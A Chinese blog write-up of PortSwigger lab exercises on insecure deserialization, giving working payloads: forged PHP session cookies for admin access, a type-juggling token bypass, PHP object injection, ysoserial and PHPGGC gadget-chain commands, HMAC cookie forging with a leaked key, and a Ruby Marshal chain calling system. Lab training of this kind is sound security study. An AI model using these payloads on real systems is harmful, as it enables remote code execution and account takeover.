PortSwigger 基于不安全的反序列化漏洞

最新推荐文章于 2024-05-28 16:15:00 发布
最新推荐文章于 2024-05-28 16:15:00 发布
阅读量628 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42451330/article/details/129506352
版权

一、反序列化漏洞简单介绍

        反序列化漏洞是指攻击者通过在应用程序中注入恶意的序列化对象来利用应用程序的反序列化功能,从而导致应用程序受到攻击的漏洞。

        在一些编程语言和应用程序中,对象可以被序列化为一些字节流或字符串,然后在不同的应用程序之间传输。当这些对象被接收时,它们需要进行反序列化以恢复原始对象。攻击者可以利用这种反序列化过程来注入恶意的代码和数据,从而导致应用程序执行恶意操作,例如远程命令执行、文件读写、数据库操作等。

        反序列化漏洞通常出现在使用序列化/反序列化来实现持久性、远程过程调用 (RPC) 或消息传递等功能的应用程序中。

二、反序列化漏洞的利用方式

        1、修改序列化对象

                (1)通过Burp Suite Scanner 发现cookie处存在漏洞

                (2)通过url解码获得base64编码

                 (3)通过base64解码获得序列化对象

                 (4) 构架经过base64-url编码的carlos cookie

               wiener解码后的cookie   :    

                        O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}

               经过构架的carloscookie :

                        O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:1;}

        base64-url编码的carlos cookie:                

                        Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6ImNhcmxvcyI7czo1OiJhZG1pbiI7YjoxO30%3D

        2、修改序列化数据类型

                利用原理:PHP 将根据初始数字有效地将整个字符串转换为整数值,例如:

                5 == "5 of something"  等于 5 == 5
                0 == "Example string"  等于 0 == 0        

                利用过程:修改序列化对象

        O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

        3、 使用应用程序功能利用不安全的反序列化

                原理:在删除用户时发生越权,可以删除其他用户下的文件。

O:4:"User":3:s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"sxxmaz8mlqg8aod8ogehb71i6b6unko4";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

        4、PHP 中的任意对象注入

                原理:PHP源码中存在可利用的魔法方法,反序列化时会检查该类里是否包含魔术方法,存在会首先调用该方法,本实验代码如下:

<?php

class CustomTemplate {
    private $template_file_path;
    private $lock_file_path;

    public function __construct($template_file_path) {
        $this->template_file_path = $template_file_path;
        $this->lock_file_path = $template_file_path . ".lock";
    }

    private function isTemplateLocked() {
        return file_exists($this->lock_file_path);
    }

    public function getTemplate() {
        return file_get_contents($this->template_file_path);
    }

    public function saveTemplate($template) {
        if (!isTemplateLocked()) {
            if (file_put_contents($this->lock_file_path, "") === false) {
                throw new Exception("Could not write to " . $this->lock_file_path);
            }
            if (file_put_contents($this->template_file_path, $template) === false) {
                throw new Exception("Could not write to " . $this->template_file_path);
            }
        }
    }

    function __destruct() {
        // Carlos thought this would be a good idea
        if (file_exists($this->lock_file_path)) {
            unlink($this->lock_file_path);
        }
    }
}

?>

注意:

        protected   属性被序列化的时候属性值会变成 %00*%00属性名;
        private       属性被序列化的时候属性值会变成 %00类名%00属性名;

     (%00为空白符,空字符也有长度,一个空字符长度为 1)。

//PHP常见的魔术方法

__construct() 当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。

__destruct() 当一个对象销毁(反序列化)时被调用

__toString() 当一个对象被当作一个字符串使用时被调用

__sleep() 在对象在被序列化之前立即运行

__wakeup() 将在序列化之后立即被调用

        开始构造系列化代码:

        O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}

        5、使用 Apache Commons 利用 Java 反序列化

        原理:Apache Commons Collections 存在反序列化任意命令执行漏洞。

        ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。

        项目地址:https://github.com/frohoff/ysoserial

        

java -jar path/to/ysoserial.jar CommonsCollections4 "rm /home/carlos/morale.txt" > 1.txt

certutil -f -encode 1.txt 2.txt

        6、使用预构建的小工具链利用 PHP 反序列化

                1、查看cookie发现存在经过base64编码的反序列化对象,并且使用hmac_sha1进行了校验,尝试修改系列化对象发现报错信息中包含Symfony 4.3.6框架。

 session=%7B%22token%22%3A%22Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJsM3I4aXRpNnN2ZTUyenNta3hhM2U1MjJnYmcxc3V4YyI7fQ%3D%3D%22%2C%22sig_hmac_sha1%22%3A%222d81e9388a0c0ef70ddbafbd86902f67823f3b7a%22%7D

                2、通过目录遍历发现存在/cgi-bin/phpinfo.php,查看phpinfo信息找到SECRET_KEY=     v90b1p0gsd9o49y5xxjlrwhg9ihc00ma 

                3、使用“PHPGGC”工具对Symfony 4进行构造,并进行base54。

        ./phpggc Symfony/RCE4 exec "rm /home/carlos/morale.txt" -b

                4、编写代码,重新构造cookie。

# 2.php
<?php
$object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319";
$secretKey = "v90b1p0gsd9o49y5xxjlrwhg9ihc00ma";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
# 运行结果
C:\Users\>php 2.php
%7B%22token%22%3A%22Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319%22%2C%22sig_hmac_sha1%22%3A%22a1e876a95939a139df0f176ce58a50a0ad49c084%22%7D

         7、使用记录的小工具链利用 Ruby 反序列化

# Autoload the required classes
Gem::SpecFetcher
Gem::Installer

# prevent the payload from running when we Marshal.dump it
module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system)

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)

战斗爽!战斗爽!战斗爽!战斗爽!战斗爽!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PortSwigger】SQL注入实验全记录
leo788的博客
05-12 897
靶场是Burp自带的网站中提供的,本篇主要对sql注入部分进行练习和记录。
HTTP请求走私 | PortSwigger(burpsuite官方靶场)| part 1
bin789456的博客
04-30 1844
写在前面 在开始之前,非常容易弄混的一点是,HTTP请求走私究竟发生在哪里? 答案是发生在负载均衡。开始之前,首先需要区别,负载均衡和cdn: 简单来说,负载均衡是一个反向代理,使用它的目的是能够对请求进行有效的分发。因为当前服务器都是分布式的,对于请求也必须做出区分,在负载均衡的两侧分别是请求池和服务器池,它就是通过各种简易或复杂的算法进行分发请求至最优策略的服务器。对于用户来说,仅仅是将请求发往这个代理,无需管后面的,而对于后端数据库,也不管是哪一个用户来进行调度数据,服务器自己来调就行,有着明显的分隔
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
最新发布
2302_76672693的博客
05-28 976
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
portswigger_文件上传漏洞
(∪.∪ )...zzz的博客
05-13 1163
这里写自定义目录标题一、是啥1. 什么是文件上传漏洞2. 文件上传漏洞如何出现3. web服务器如何处理静态的文件请求二、类型1. 任意上传以部署webshelllab:上传webshell进行远程代码执行2. 文件类型验证存在缺陷lab:上传webshell 通过Content-Type 限制绕过3. 防止文件执行lab:上传webshell通过目录遍历4. 黑名单不足4.1 覆盖服务器配置lab: 通过黑名单之外的上传webshell——.htaccess4.2 混淆文件后缀lab5:文件后缀混淆来绕过
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 1489
该文章为portswigger中CSRF中绕过token篇。
大黑客养成系列:Top10漏洞利用方式、靶场通关笔记、好用工具分享、漏洞挖掘技巧、安全研究、前沿技术探索.zip
01-14
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 .pdf
09-05
Burpsuite,由PortSwigger发行,是网络安全专家必不可少的工具,其在线网络安全学院提供了丰富的实践资源,帮助初学者提升技能。DOM(Document Object Model)是网页元素的层次结构表示,JavaScript可以通过DOM来...
BurpSuite v2.1 开源安全测试工具
08-06
- **Scanner**:自动扫描目标应用程序,寻找潜在的安全漏洞,如SQL注入、跨站脚本(XSS)等。 - ** Intruder**:用于进行各种类型的攻击,如字典攻击、模糊测试,帮助发现输入验证漏洞。 - **Repeater**:手动...
Burp-代码漏洞扫描安装包
04-28
在“Burp-代码漏洞扫描安装包”中,主要包含的是 Burp Suite 的无限制版本,提供全面的功能以检测和修复代码级别的安全漏洞。 **1. Burp Suite 组件** - **Proxy(代理)**: 作为 HTTP/HTTPS 流量的中间人,拦截并...
portswigger靶场中目录遍历
剁椒鱼头没剁椒的博客
01-15 1238
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习。
portswigger靶场SQL注入实验(上)
m0_51313985的博客
09-09 3143
最近发现一个挺不错的靶场,burpsuite的官方网站在线训练平台 不多说先到第一个系列的实验去一探究竟 麻了,英文界面属实不太友好! 所以我决定用谷歌看题,火狐去操作(主要火狐用习惯了) 第一个系列的实验为SQL注入,先来简单了解一下吧。 什么是SQL注入? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导
PortSwigger web缓存中毒(Cache Poisoning)
weixin_42451330的博客
06-12 1516
Web缓存中毒(Web Cache Poisoning)是一种攻击技术,攻击者通过操纵Web应用程序的缓存系统,将恶意或欺骗性内容注入到合法的缓存中,以欺骗用户或绕过安全控制。Web缓存中毒的原理是利用缓存服务器在接收到请求后,将响应保存在缓存中并将相同响应返回给后续请求的用户。攻击者通过在请求中操纵参数、头部或URL等,使缓存服务器错误地将恶意或欺骗性响应存储在缓存中。当其他用户发起相同请求时,缓存服务器将返回被注入的恶意响应,从而达到攻击的目的。
PortSwigger网络安全学院学习路径
周无争的博客
09-26 846
以下是如何充分利用网络安全学院的方法 如果你是网络安全新手,可能很难知道从哪里开始。这就是为什么我们给出这条建议的学习路径,为你指明正确的方向。我们建议你按顺序完成实验,但是如果遇到困难,那就继续下一个主题。一旦你增长了技能,你可以再回来解决这些有挑战的实验。 当你开始培养你的网络安全测试技能时,你可以尝试考取我们的BurpSuite从业者认证来测试自己的技能。在你准备尝试BurpSuite从业者认证考试之前,你应该能够轻松完成网络安全学院中所有标有Practitio...
2020-12-18
LPL_hacker的博客
12-18 1046
这个问题是由 PortSwigger CA 所造成,它是您的计算机或您所在网络中的软件。 Burp Suite未连接:有潜在的安全问题 PortSwigger CA 造成 分享一次艰难的拯救经历: 首先说明发生此问题的症状: 只要你打开可BurpSuite,所有的浏览器的所有的网页都无法访问。 其次说明我发生此现象的原因: 应该是手欠,再就是可恶的Windows Defender提示,不小心删除了PortSwigger CA造成的。 现象如下图: 这个问题首先我的情况比较特殊,因为我平时
PortSwigger 跨站点脚本(XSS)
weixin_42451330的博客
11-30 1557
本文介绍PortSwigger靶场 跨站点脚本(XSS),包括反射型、存储型、DOM型。如有疑问欢迎私聊。
laravel5.8 反序列化漏洞复现
Zero_Adam的博客
06-22 2644
1. 前言 依旧跟着feng师傅学吧, 还是再github上下载源码:laravel5.8。往composer.json的require里面加上"symfony/symfony": “4.*”,然后composer update。 如果提示 Allowed memory size of bytes exhausted,参考这篇文章:运行 composer update,提示 Allowed memory size of bytes exhausted 如果想我这里一样:就报个error。。(弄好之后没那个报
序列化和反序列化漏洞的简单理解
jameson_的专栏
06-28 2万+
1 背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。 然而事实上,博客作者并不是漏洞发现者。博客中提到,早在2015年的1月28号,Gabriel
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用程序的身份验证机制的安全性。在进行身份验证测试时,可能会涉及到JSON Web Token(JWT)的使用。JWT是一种用于在网络应用之间传递信息的安全方式。然而,JWT也存在一些安全漏洞,其中一些与身份验证相关。引用\[1\]提到了一些JWT的实现缺陷,如没有正确验证签名、服务器密钥泄露等问题。引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\[3\]提到了一些签名算法的安全性问题。在进行PortSwigger的Authentication模块测试时,可以关注这些JWT相关的安全问题,以帮助发现和修复应用程序中的身份验证漏洞。 #### 引用[.reference_title] - *1* *2* *3* [portswigger JWT attacks](https://blog.csdn.net/weixin_63231007/article/details/127684964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值